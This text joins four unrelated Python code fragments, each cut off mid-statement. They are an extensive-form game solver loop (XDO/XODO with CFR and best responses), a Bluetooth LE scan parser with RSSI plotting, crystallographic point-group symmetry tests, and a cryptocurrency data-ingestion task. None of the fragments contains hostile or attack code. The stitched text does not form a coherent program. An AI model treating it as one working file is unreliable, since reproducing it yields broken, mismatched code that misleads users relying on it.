len(get_all_states.get_all_states(game, include_chance_states=True)) uniform = policy.UniformRandomPolicy(game) br_list = [] for pid in [0, 1]: br_list.append([best_response.BestResponsePolicy(game, pid, uniform)]) ############################### start_time = time.time() cum_brtime = 0 xdo_times = [] xdo_exps = [] xdo_episodes = [] xdo_infostates = [] xdo_brtimes = [] xdo_outers = [] xdo_res_game_size = [] br_conv_threshold = starting_br_conv_threshold outer_loop = 0 episode = 0 # num_infostates = 0 nash_support_reached = False prev_cum_num_infostates = 0 num_infostates = 0 for i in range(iterations): print('Iteration: ', i) restricted_game = xdo.WrappedGame(game, br_list) if meta_solver == 'external': solver = external_mccfr.ExternalSamplingSolver(restricted_game, external_mccfr.AverageType.SIMPLE) elif meta_solver == 'xfp': solver = fictitious_play.XFPSolver(restricted_game) elif meta_solver == 'lcfr_plus': solver = cfr.CFRPlusSolver(restricted_game) elif meta_solver == 'cfr': solver = cfr.CFRSolver(restricted_game) double_next_time = False while True: for inner_loop_iter in tqdm(range(int(xdo_iterations))): episode += 1 if meta_solver in ['cfr', 'lcfr_plus']: solver.evaluate_and_update_policy() else: solver.iteration() restricted_exploitability = exploitability.nash_conv(restricted_game, solver.average_policy()) / 2 print(f'inner loop (restricted) exploitability: {restricted_exploitability}') # if nash_support_reached: # total_exploitability = exploitability.nash_conv(()) # total_exploitability = 0 ############################ # make BRs and save data if old_schedule: if restricted_exploitability < br_conv_threshold and i > 0: br_conv_threshold /= 2 break print('making full policy') full_policy = xdo.LazyTabularPolicy(restricted_game, game, solver.average_policy()) print('making new brs') brtime_start = time.time() avg_exploitability = 0 new_brs = [] for pid in [0, 1]: new_br = best_response.BestResponsePolicy(game, pid, full_policy, add_noise=random_max_br) new_brs.append(new_br) avg_exploitability += new_br.value(game.new_initial_state()) / 2 brtime_end = time.time() cum_brtime += brtime_end - brtime_start print(f'avg (full) exploitability: {avg_exploitability}') elapsed_time = time.time() - start_time print('Total elapsed time: ', elapsed_time) save_prefix = './results/' + algorithm + '_' + meta_solver + '_' + game_name + str( old_schedule) + extra_info if meta_solver in ['cfr', 'lcfr_plus', 'external', 'xfp']: # num_infostates = prev_cum_num_infostates + solver.num_infostates_expanded num_infostates += solver.num_infostates_expanded * xdo_iterations xdo_infostates.append(num_infostates) print('Num infostates expanded (mil): ', num_infostates / 1e6) print(f"saving to: {save_prefix + '_infostates.npy'}") np.save(save_prefix + '_infostates', np.array(xdo_infostates)) else: num_infostates = 0 restricted_game_size = len(get_all_states.get_all_states(restricted_game, include_chance_states=True)) xdo_times.append(elapsed_time) xdo_exps.append(avg_exploitability) xdo_episodes.append(episode) xdo_brtimes.append(cum_brtime) xdo_outers.append(outer_loop) xdo_res_game_size.append(restricted_game_size) print(f'outer loop: {outer_loop}, restricted game size: {restricted_game_size}') ensure_dir(save_prefix) print(f"saving to: {save_prefix + '_times.npy'}") np.save(save_prefix + '_times', np.array(xdo_times)) print(f"saving to: {save_prefix + '_exps.npy'}") np.save(save_prefix + '_exps', np.array(xdo_exps)) print(f"saving to: {save_prefix + '_episodes.npy'}") np.save(save_prefix + '_episodes', np.array(xdo_episodes)) print(f"saving to: {save_prefix + '_brtimes.npy'}") np.save(save_prefix + '_brtimes', np.array(xdo_brtimes)) print(f"saving to: {save_prefix + '_outers.npy'}") np.save(save_prefix + '_outers', np.array(xdo_outers)) print(f"saving to: {save_prefix + '_res_game_size.npy'}") np.save(save_prefix + '_res_game_size', np.array(xdo_res_game_size)) ############################### if avg_exploitability != restricted_exploitability: if abs(avg_exploitability - restricted_exploitability) < 0.00001: print( "EXPLOITABILITY IS DIFFERENT BUT BELOW ALLOWABLE TOLERANCE! THIS IS WRONG IF IT CONTINUES HAPPENING") continue print("no support :((((((((((((((((((((((") if restricted_exploitability > inner_thresh: xdo_iterations = int(xdo_iterations * 1.4) continue else: for pid in [0, 1]: br_list[pid].append(new_brs[pid]) # num_infostates += len(new_brs[pid].cache_value) # print(len(new_brs[pid].cache_value)) num_infostates += size_of_game outer_loop += 1 print(f"adding brs: brs explore {size_of_game} infostates each") prev_cum_num_infostates = num_infostates inner_thresh *= 0.98 print(f"inner loop exploitability threshold set to {inner_thresh}") break else: print("has full support!!!!!!!!!!!!!!!") xdo_iterations = int(xdo_iterations * 1.02) elif algorithm == 'xodo': size_of_game = len(get_all_states.get_all_states(game, include_chance_states=True)) brs, info_test = [], [] br_actions = {} start_time = time.time() uniform = policy.UniformRandomPolicy(game) for pid in range(2): br = best_response.BestResponsePolicy(game, pid, uniform, add_noise=random_max_br) _ = br.value(game.new_initial_state()) for key, action in br.cache_best_response_action.items(): br_actions[key] = [action] brs.append(br) new_br = True br_list = [[brs[0]], [brs[1]]] restricted_game = xdo.WrappedGame(game, br_list) if meta_solver == 'external': solver = external_mccfr.ExternalSamplingSolver(restricted_game, external_mccfr.AverageType.SIMPLE) elif meta_solver == 'xfp': solver = fictitious_play.XFPSolver(restricted_game) elif meta_solver == 'lcfr_plus': solver = cfr.CFRPlusSolver(restricted_game) elif meta_solver == 'cfr': solver = cfr.CFRSolver(restricted_game) xdo_times = [] xdo_exps = [] xdo_exps_brtimes = [] xdo_episodes = [] xdo_infostates = [] episode = 0 num_infostates = 0 num_infostates_prev_iteration = 0 for i in range(iterations): print('Iteration: ', i) full_policy = xdo.LazyTabularPolicy(restricted_game, game, solver.average_policy()) conv = exploitability.exploitability(game, full_policy) save_prefix = './results/' + algorithm + '_' + meta_solver + '_' + game_name + extra_info if (new_br and i > 0) or i % 5 == 0: check_start = time.time() start_time += (time.time() - check_start) print("Iteration {} exploitability {}".format(i, conv)) elapsed_time = time.time() - start_time print('Total elapsed time: ', elapsed_time) num_infostates += solver.num_infostates_expanded * xodo_iterations num_infostates_prev_iteration = solver.num_infostates_expanded print('Num infostates expanded (mil): ', num_infostates / 1e6) xdo_times.append(elapsed_time) xdo_exps.append(conv) xdo_episodes.append(episode) xdo_infostates.append(num_infostates) ensure_dir(save_prefix) print(f"saving to: {save_prefix + '_times.npy'}") np.save(save_prefix + '_times', np.array(xdo_times)) print(f"saving to: {save_prefix + '_exps.npy'}") np.save(save_prefix + '_exps', np.array(xdo_exps)) print(f"saving to: {save_prefix + '_episodes.npy'}") np.save(save_prefix + '_episodes', np.array(xdo_episodes)) print(f"saving to: {save_prefix + '_infostates.npy'}") np.save(save_prefix + '_infostates', np.array(xdo_infostates)) if new_br and i > 0: num_infostates_prev_iteration = 0 restricted_game = xdo.WrappedGame(game, br_list) if meta_solver == 'external': solver = external_mccfr.ExternalSamplingSolver(restricted_game, external_mccfr.AverageType.SIMPLE) elif meta_solver == 'xfp': solver = fictitious_play.XFPSolver(restricted_game) elif meta_solver == 'lcfr_plus': solver = cfr.CFRPlusSolver(restricted_game) else: solver = cfr.CFRSolver(restricted_game) for _ in tqdm(range(xodo_iterations)): if meta_solver in ['cfr', 'lcfr_plus']: solver.evaluate_and_update_policy() else: solver.iteration() new_brs = [] new_br = False full_policy = xdo.LazyTabularPolicy(restricted_game, game, solver.average_policy()) for pid in range(2): br = best_response.BestResponsePolicy(game, pid,
while (ser.inWaiting()): bgapi_parse_csv(ord(ser.read())); # else: # if options.quiet and options.friendly and options.csv : # while (ser.inWaiting()): bgapi_parse_csv(ord(ser.read())); # else: # while (ser.inWaiting()): bgapi_parse(ord(ser.read())); while (ser.inWaiting()): bgapi_parse_plot(ord(ser.read())); # don't burden the CPU time.sleep(0.0001) # thanks to <NAME> for Python event handler code # http://www.emptypage.jp/notes/pyevent.en.html class BGAPIEvent(object): def __init__(self, doc=None): self.__doc__ = doc def __get__(self, obj, objtype=None): if obj is None: return self return BGAPIEventHandler(self, obj) def __set__(self, obj, value): pass class BGAPIEventHandler(object): def __init__(self, event, obj): self.event = event self.obj = obj def _getfunctionlist(self): """(internal use) """ try: eventhandler = self.obj.__eventhandler__ except AttributeError: eventhandler = self.obj.__eventhandler__ = {} return eventhandler.setdefault(self.event, []) def add(self, func): """Add new event handler function. Event handler function must be defined like func(sender, earg). You can add handler also by using '+=' operator. """ self._getfunctionlist().append(func) return self def remove(self, func): """Remove existing event handler function. You can remove handler also by using '-=' operator. """ self._getfunctionlist().remove(func) return self def fire(self, earg=None): """Fire event and call all handler functions You can call EventHandler object itself like e(earg) instead of e.fire(earg). """ for func in self._getfunctionlist(): func(self.obj, earg) __iadd__ = add __isub__ = remove __call__ = fire #================================================================================================================================================== #================================================================================================================================================== #================================================================================================================================================== #===================================================== # # define API commands we might use for this script # #===================================================== def ble_cmd_system_reset(p, boot_in_dfu): p.write(struct.pack('5B', 0, 1, 0, 0, boot_in_dfu)) def ble_cmd_connection_disconnect(p, connection): p.write(struct.pack('5B', 0, 1, 3, 0, connection)) def ble_cmd_gap_set_mode(p, discover, connect): p.write(struct.pack('6B', 0, 2, 6, 1, discover, connect)) def ble_cmd_gap_end_procedure(p): p.write(struct.pack('4B', 0, 0, 6, 4)) def ble_cmd_gap_set_scan_parameters(p, scan_interval, scan_window, active): p.write(struct.pack('<4BHHB', 0, 5, 6, 7, scan_interval, scan_window, active)) def ble_cmd_gap_discover(p, mode): p.write(struct.pack('5B', 0, 1, 6, 2, mode)) #===================================================== #===================================================== # define basic BGAPI parser bgapi_rx_buffer = [] bgapi_rx_expected_length = 0 def bgapi_parse_plot(b): global bgapi_rx_buffer, bgapi_rx_expected_length, df, ax, instr_search, byte_switch, byte_position_ , df_byte, bx data_packet=None select_byte_data_as_str=None select_byte_date_as_int=None if len(bgapi_rx_buffer) == 0 and (b == 0x00 or b == 0x80): bgapi_rx_buffer.append(b) elif len(bgapi_rx_buffer) == 1: bgapi_rx_buffer.append(b) bgapi_rx_expected_length = 4 + (bgapi_rx_buffer[0] & 0x07) + bgapi_rx_buffer[1] elif len(bgapi_rx_buffer) > 1: bgapi_rx_buffer.append(b) #print '%02X: %d, %d' % (b, len(bgapi_rx_buffer), bgapi_rx_expected_length) if bgapi_rx_expected_length > 0 and len(bgapi_rx_buffer) == bgapi_rx_expected_length: #print '<=[ ' + ' '.join(['%02X' % b for b in bgapi_rx_buffer ]) + ' ]' packet_type, payload_length, packet_class, packet_command = bgapi_rx_buffer[:4] bgapi_rx_payload = bytes(bgapi_rx_buffer[4:]) if packet_type & 0x80 == 0x00: # response bgapi_filler = 0 else: # event if packet_class == 0x06: # gap if packet_command == 0x00: # scan_response rssi, packet_type, sender, address_type, bond, data_len = struct.unpack('<bB6sBBB', bgapi_rx_payload[:11]) sender = [b for b in sender] data_data = [b for b in bgapi_rx_payload[11:]] display = 1 # parse all ad fields from ad packet ad_fields = [] this_field = [] ad_flags = 0 ad_services = [] ad_local_name = [] ad_tx_power_level = 0 ad_manufacturer = [] bytes_left = 0 for b in data_data: if bytes_left == 0: bytes_left = b this_field = [] else: this_field.append(b) bytes_left = bytes_left - 1 if bytes_left == 0: ad_fields.append(this_field) if this_field[0] == 0x01: # flags ad_flags = this_field[1] if this_field[0] == 0x02 or this_field[0] == 0x03: # partial or complete list of 16-bit UUIDs # for i in xrange((len(this_field) - 1) / 2): for i in range(int((len(this_field) - 1) / 2)): ad_services.append(this_field[-1 - i*2 : -3 - i*2 : -1]) if this_field[0] == 0x04 or this_field[0] == 0x05: # partial or complete list of 32-bit UUIDs # for i in xrange((len(this_field) - 1) / 4): for i in range(int((len(this_field) - 1) / 4)): ad_services.append(this_field[-1 - i*4 : -5 - i*4 : -1]) if this_field[0] == 0x06 or this_field[0] == 0x07: # partial or complete list of 128-bit UUIDs # for i in xrange((len(this_field) - 1) / 16): for i in range(int((len(this_field) - 1) / 16)): ad_services.append(this_field[-1 - i*16 : -17 - i*16 : -1]) if this_field[0] == 0x08 or this_field[0] == 0x09: # shortened or complete local name ad_local_name = this_field[1:] if this_field[0] == 0x0A: # TX power level ad_tx_power_level = this_field[1] # OTHER AD PACKET TYPES NOT HANDLED YET if this_field[0] == 0xFF: # manufactuerer specific data ad_manufacturer.append(this_field[1:]) if len(filter_mac) > 0: match = 0 for mac in filter_mac: if mac == sender[:-len(mac) - 1:-1]: match = 1 break if match == 0: display = 0 if display and len(filter_uuid) > 0: if not [i for i in filter_uuid if i in ad_services]: display = 0 if display and filter_rssi > 0: if -filter_rssi > rssi: display = 0 data_packet="" data_packet=str(data_packet.join(['%02X' % b for b in data_data])) # print ( " Data packet : " + data_packet + " instr search :: " + instr_search) ## debug line select_byte_data_as_int=None #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- if display and len(instr_search)>0 : if (data_packet.find(instr_search) > -1) : #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- if (byte_position_ > -1 ) : select_byte_data_as_str=data_packet[ byte_position_ : ( byte_position_ +2 )] if (all(c in string.hexdigits for c in select_byte_data_as_str)) : #check that the selected data at byte_position is valid hex data select_byte_data_as_int=int(select_byte_data_as_str, 16) # print("Raw packet data :: " + data_packet) # Debug # print("byte to pick up from payload_status is :: " + str(byte_position_) + "recovered data :: " + select_byte_data_as_str) # print("recovered data :: " + str(select_byte_data_as_int)) if byte_switch == True : #------------------------------------------------------------------------------------------------------------------- # If there is conversion method to convert the selected byte to a RSSI value it should # added here #------------------------------------------------------------------------------------------------------------------- rssi = select_byte_data_as_int else : if byte_switch == True : byte_switch = False t = datetime.datetime.now() t_now= float("%ld.%03ld" % (time.mktime(t.timetuple()), t.microsecond/1000)) t_start=float("%ld.%03ld" % (time.mktime(start_time.timetuple()), start_time.microsecond/1000)) t_run=t_now-t_start disp_list = [] for c in options.display: if c == 't': if options.time_in_ms: disp_list.append("%f" % t_run ) if not(options.time_in_ms): disp_list.append("%ld.%03ld" % (time.mktime(t.timetuple()), t.microsecond/1000) ) elif c == 'r': disp_list.append("%d" % rssi) elif c == 'p': disp_list.append("%d" % packet_type) elif c == 's': disp_list.append("%s" % ''.join(['%02X' % b for b in sender[::-1]])) elif c == 'a': disp_list.append("%d" % address_type) elif c == 'b': disp_list.append("%d" % bond) elif c == 'd': disp_list.append("%s" % ''.join(['%02X' % b for b in data_data])) #disp_list.append("%s" % ''.join([data_packet])) if options.csv : if options.byte : op_str= "\"" + remove('\";\"'.join(disp_list)) + "\"" + ';\"' + str(select_byte_data_as_int) + "\"" else : op_str= "\"" + remove('\";\"'.join(disp_list)) + "\"" print(op_str) else: if (options.comma or not(options.comma)) and not(options.csv): if options.byte : op_str= " " + remove(', '.join(disp_list)) + "," + str(select_byte_data_as_int) else : op_str= " " + remove(', '.join(disp_list)) + "" print(op_str) # print "gap_scan_response: rssi: %d, packet_type: %d, sender: %s, address_type: %d, bond: %d, data_len: %d" % \ # (rssi, packet_type, ':'.join(['%02X' % ord(b) for b in sender[::-1]]), address_type, bond, data_len) # #------------------------------------------------------------------------------------------------------------------- # # Real time graph plotting routine # # #------------------------------------------------------------------------------------------------------------------- # receive python object if options.plot and options.time_in_ms : # print ("Raw data :: " , t_run, rssi ) #print(op_str) row =pd.DataFrame({'x':[t_run] ,'y':[rssi]}) df = pd.concat([df, row]) #df = pd.append([df, row]) # print ("df :: " , df ) # print (df.dtypes) #plot all data ax.plot(df['x'] ,df['y'], color='r') # show the plot plt.show() plt.pause(0.0001) # <-- sets the current plot until refreshed # #------------------------------------------------------------------------------------------------------------------- if options.instr and options.byte and options.plotbyte and options.time_in_ms : # print ("Raw data :: " , t_run, rssi ) #print(op_str) row2 =pd.DataFrame({'x':[t_run] ,'y':[select_byte_data_as_int]}) df_byte = pd.concat([df_byte, row2]) #df = pd.append([df, row]) # print ("df :: " , df ) # print (df.dtypes) #plot all data bx.plot(df_byte['x'] ,df_byte['y'], color='r') # show the plot plt.show() plt.pause(0.0001) # <-- sets the current plot until refreshed #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- else : #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- #------------------------------------------------------------------------------------------------------------------- if display: #print "gap_scan_response: rssi: %d, packet_type: %d, sender: %s, address_type: %d, bond: %d, data_len: %d" % \ # (rssi, packet_type, ':'.join(['%02X' % ord(b) for b in sender[::-1]]), address_type, bond, data_len) t = datetime.datetime.now() t_now= float("%ld.%03ld" % (time.mktime(t.timetuple()), t.microsecond/1000)) t_start=float("%ld.%03ld" % (time.mktime(start_time.timetuple()), start_time.microsecond/1000)) t_run=t_now-t_start disp_list = [] for c in options.display: if c == 't': if options.time_in_ms: disp_list.append("%f" % t_run ) if not(options.time_in_ms): disp_list.append("%ld.%03ld" % (time.mktime(t.timetuple()), t.microsecond/1000) ) elif c == 'r': disp_list.append("%d" % rssi) elif c == 'p': disp_list.append("%d" % packet_type) elif c == 's':
two symmetries, test that both do not exist in the # subgroup of the other sym1 = all_symmetries # identify place in list by name, cannot test symmetry directy as D3 # and D3x are the same and causes an index issue i = [s.name for s in _groups].index(sym1.name) if i + 1 < len(_groups): values = [] # only test successive symmetries in _groups to avoid repetition for sym2 in _groups[i + 1 :]: if {sym1.name, sym2.name} == {"32", "321"}: # D3 and D3x are defined to be the same, so do not test continue sym2_in_sym1_sg = True if sym2 in sym1.subgroups else False sym1_in_sym2_sg = True if sym1 in sym2.subgroups else False values.append(sym2_in_sym1_sg + sym1_in_sym2_sg) # value==0 is okay, ie. unrelated symmetries # value==1 is okay, ie. only one is subgroup of other # if value==2 then both symmetries exist in subgroup of other assert not any(v == 2 for v in values) def test_unique_unrelated_symmetries(): sym1 = D6 sym2 = C4 assert sym1 not in sym2.subgroups assert sym2 not in sym1.subgroups # unique will be computed manually sym12 = _get_unique_symmetry_elements(sym1, sym2) sym21 = _get_unique_symmetry_elements(sym2, sym1) sym12 = sym12[np.lexsort(sym12.data.T)] sym21 = sym21[np.lexsort(sym21.data.T)] assert sym12.size == sym21.size # symmetry order matters, as discussed in # DOI: http://dx.doi.org/10.1098/rspa.2017.0274 assert not np.allclose(sym12.data, sym21.data) def test_hash(): h = [hash(s) for s in _groups] assert len(set(h)) == len(_groups) def test_hash_persistence(): h1 = [hash(s) for s in _groups] h2 = [hash(deepcopy(s)) for s in _groups] assert all(h1a == h2a for h1a, h2a in zip(h1, h2)) @pytest.mark.parametrize("symmetry", [C1, C4, Oh]) def test_symmetry_plot(symmetry): figure = symmetry.plot(return_figure=True) assert isinstance(figure, plt.Figure) assert len(figure.axes) == 1 ax = figure.axes[0] num = 1 if symmetry.is_proper else 2 assert len(ax.collections) == num c0 = ax.collections[0] assert len(c0.get_offsets()) == np.count_nonzero(~symmetry.improper) assert c0.get_label().lower() == "upper" if num > 1: c1 = ax.collections[1] assert len(c1.get_offsets()) == np.count_nonzero(symmetry.improper) assert c1.get_label().lower() == "lower" assert len(ax.texts) == 2 assert ax.texts[0].get_text() == "a" assert ax.texts[1].get_text() == "b" plt.close("all") @pytest.mark.parametrize("symmetry", [C1, C4, Oh]) def test_symmetry_plot_raises(symmetry): with pytest.raises(TypeError, match="Orientation must be a Rotation instance"): _ = symmetry.plot(return_figure=True, orientation="test") class TestFundamentalSectorFromSymmetry: """Test the normals, vertices and centers of the fundamental sector for all 32 crystallographic point groups. """ def test_fundamental_sector_c1(self): pg = C1 # 1 fs = pg.fundamental_sector assert fs.data.size == 0 assert fs.vertices.data.size == 0 assert fs.center.data.size == 0 assert fs.edges.data.size == 0 def test_fundamental_sector_ci(self): pg = Ci # -1 fs = pg.fundamental_sector normal = [[0, 0, 1]] assert np.allclose(fs.data, normal) assert fs.vertices.data.size == 0 assert np.allclose(fs.center.data, normal) def test_fundamental_sector_c2(self): pg = C2 # 2 fs = pg.fundamental_sector normal = [[0, 1, 0]] assert np.allclose(fs.data, normal) assert fs.vertices.data.size == 0 assert np.allclose(fs.center.data, normal) def test_fundamental_sector_cs(self): pg = Cs # m fs = pg.fundamental_sector normal = [[0, 0, 1]] assert np.allclose(fs.data, normal) assert fs.vertices.data.size == 0 assert np.allclose(fs.center.data, normal) def test_fundamental_sector_c2h(self): pg = C2h # 2/m fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [-1, 0, 0]]) assert np.allclose(fs.center.data, [[0, 0.5, 0.5]]) def test_fundamental_sector_d2(self): pg = D2 # 222 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [-1, 0, 0]]) assert np.allclose(fs.center.data, [[0, 0.5, 0.5]]) def test_fundamental_sector_c2v(self): pg = C2v # mm2 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [-1, 0, 0]]) assert np.allclose(fs.center.data, [[0, 0.5, 0.5]]) def test_fundamental_sector_d2h(self): pg = D2h # mmm fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [1, 0, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.center.data, [[1 / 3, 1 / 3, 1 / 3]]) def test_fundamental_sector_c4(self): pg = C4 # 4 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 1, 0], [1, 0, 0]]) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.5, 0.5, 0]]) def test_fundamental_sector_s4(self): pg = S4 # -4 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [-1, 0, 0]]) assert np.allclose(fs.center.data, [[0, 0.5, 0.5]]) def test_fundamental_sector_c4h(self): pg = C4h # 4/m fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [1, 0, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.center.data, [[1 / 3, 1 / 3, 1 / 3]]) def test_fundamental_sector_d4(self): pg = D4 # 422 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [1, 0, 0]]) assert np.allclose(fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0, 1, 0]]) assert np.allclose(fs.center.data, [[1 / 3, 1 / 3, 1 / 3]]) def test_fundamental_sector_c4v(self): pg = C4v # 4mm fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 1, 0], [0.7071, -0.7071, 0]], atol=1e-4) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.3536, 0.1464, 0]], atol=1e-4) def test_fundamental_sector_d2d(self): pg = D2d # -42m fs = pg.fundamental_sector assert np.allclose( fs.data, [[0, 0, 1], [0.7071, 0.7071, 0], [0.7071, -0.7071, 0]], atol=1e-4 ) assert np.allclose( fs.vertices.data, [[0.7071, -0.7071, 0], [0, 0, 1], [0.7071, 0.7071, 0]] ) assert np.allclose(fs.center.data, [[0.4714, 0, 1 / 3]], atol=1e-4) def test_fundamental_sector_d4h(self): pg = D4h # 4/mmm fs = pg.fundamental_sector assert np.allclose( fs.data, [[0, 0, 1], [0, 1, 0], [0.7071, -0.7071, 0]], atol=1e-4 ) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0.7071, 0.7071, 0]], atol=1e-4 ) assert np.allclose(fs.center.data, [[0.569, 0.2357, 1 / 3]], atol=1e-3) def test_fundamental_sector_c3(self): pg = C3 # 3 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 1, 0], [0.866, 0.5, 0]], atol=1e-3) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.433, 0.75, 0]], atol=1e-4) def test_fundamental_sector_s6(self): pg = S6 # -3 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, 0.5, 0]], atol=1e-3) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [-0.5, 0.866, 0]], atol=1e-4 ) assert np.allclose(fs.center.data, [[1 / 6, 0.2887, 1 / 3]], atol=1e-4) def test_fundamental_sector_d3(self): pg = D3 # 32 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, 0.5, 0]], atol=1e-3) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [-0.5, 0.866, 0]], atol=1e-4 ) assert np.allclose(fs.center.data, [[1 / 6, 0.2887, 1 / 3]], atol=1e-4) def test_fundamental_sector_c3v(self): pg = C3v # 3m fs = pg.fundamental_sector assert np.allclose(fs.data, [[0.5, 0.866, 0], [0.5, -0.866, 0]], atol=1e-3) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.5, 0, 0]]) def test_fundamental_sector_d3d(self): pg = D3d # -3m fs = pg.fundamental_sector assert np.allclose( fs.data, [[0, 0, 1], [0.5, 0.866, 0], [0.5, -0.866, 0]], atol=1e-3 ) assert np.allclose( fs.vertices.data, [[0.866, -0.5, 0], [0, 0, 1], [0.866, 0.5, 0]], atol=1e-3 ) assert np.allclose(fs.center.data, [[0.577, 0, 1 / 3]], atol=1e-3) def test_fundamental_sector_c6(self): pg = C6 # 6 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 1, 0], [0.866, -0.5, 0]], atol=1e-3) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.433, 0.25, 0]], atol=1e-3) def test_fundamental_sector_c3h(self): pg = C3h # -6 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, 0.5, 0]], atol=1e-3) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [-0.5, 0.866, 0]], atol=1e-3 ) assert np.allclose(fs.center.data, [[1 / 6, 0.2887, 1 / 3]], atol=1e-4) def test_fundamental_sector_c6h(self): pg = C6h # 6/m fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, -0.5, 0]], atol=1e-3) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0.5, 0.866, 0]], atol=1e-3 ) assert np.allclose(fs.center.data, [[0.5, 0.2887, 1 / 3]], atol=1e-4) def test_fundamental_sector_d6(self): pg = D6 # 622 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, -0.5, 0]], atol=1e-3) assert np.allclose( fs.vertices.data, [[1, 0, 0], [0, 0, 1], [0.5, 0.866, 0]], atol=1e-3 ) assert np.allclose(fs.center.data, [[0.5, 0.2887, 1 / 3]], atol=1e-4) def test_fundamental_sector_c6v(self): pg = C6v # 6mm fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 1, 0], [0.5, -0.866, 0]], atol=1e-3) assert np.allclose(fs.vertices.data, [[0, 0, 1], [0, 0, -1]]) assert np.allclose(fs.center.data, [[0.25, 0.067, 0]], atol=1e-3) def test_fundamental_sector_d3h(self): pg = D3h # -6m2 fs = pg.fundamental_sector assert np.allclose(fs.data, [[0, 0, 1], [0, 1, 0], [0.866, -0.5,
<filename>ingestion/tasks.py import concurrent.futures import datetime import pymongo import urllib.request from common import database as db, util from ingestion import config, manager as mgr from ingestion.datasources import reddit, twitter, cryptocompare as cc, coinmarketcap as cmc, stocktwits as st from ingestion import analysis def init(): db.init(config.database) db.create_indexes() reddit.init_api() twitter.init_api() class ImportCoinList(mgr.IngestionTask): """ Task to import the list of coins from coinmarketcap.com and cryptocompare.com This checks all coins on every run, and only makes updates to new/changed items in the db while this is inefficient, this only needs to run a couple times a day and it's better to be sure we have correct info, as all other tasks depend on it """ def __get_links(self, coin): links = self._get_data(cmc.CoinLinks(coin)) if links is None: return None # If we have a subreddit, make sure it's valid, because some links are broken on cmc if "subreddit" in links: if not reddit.is_valid(links["subreddit"]): self._warn("Invalid subreddit {}".format(links["subreddit"])) del links["subreddit"] missing_links = {"subreddit", "twitter", "btctalk_ann"} - set(links.keys()) if len(missing_links) > 0 and "cc_id" in coin: cc_links = self._get_data(cc.CoinLinks(coin["cc_id"])) if cc_links: for missing_link in missing_links: if missing_link in cc_links: links[missing_link] = cc_links[missing_link] return links @staticmethod def __duplicate_symbols(coins): """Returns a list of symbols that have duplicates in the coin list""" symbols = set() duplicate_symbols = set() for coin in coins: sym = coin["symbol"] if sym in symbols: duplicate_symbols.add(sym) else: symbols.add(sym) return duplicate_symbols def __merge_cc_data(self, coins, cc_coins): """Merges the cryptocompare ids into the coin list this allows us to pull coin data from both sources """ def full_id(coin): return "{}_{}".format(coin["symbol"], coin["name"]).lower() # Symbols are not guaranteed to be unique, so to be sure we map a coin from # coinmarketcap to cryptocompare we use <symbol_name> as the id cc_lookup = {} for coin in cc_coins: cid = full_id(coin) if cid in cc_lookup: self._fatal("Duplicate cid {}".format(cid)) else: cc_lookup[cid] = coin for coin in coins: cid = full_id(coin) if cid in cc_lookup: coin["cc_id"] = cc_lookup[cid]["cc_id"] coin["icon"] = cc_lookup[cid]["icon"] def _run(self): current_coins = self._get_data(cmc.CoinList()) cc_coins = self._get_data(cc.CoinList()) if not current_coins or not cc_coins: self._fatal("Failed to get coinlists from remotes") stored_coins = db.get_coins() # Find the set of ids that we don't have in the database yet current_ids = util.list_to_set(current_coins, "cmc_id") stored_ids = util.list_to_set(stored_coins, "cmc_id") new_ids = current_ids - stored_ids # map from coinmarketcap id to coins stored_coins_map = util.list_to_dict(stored_coins, "cmc_id") print("Total current coins (coinmarketcap.com):", len(current_ids)) print("Locally stored coins:", len(stored_ids)) print("New coins to process:", len(new_ids)) 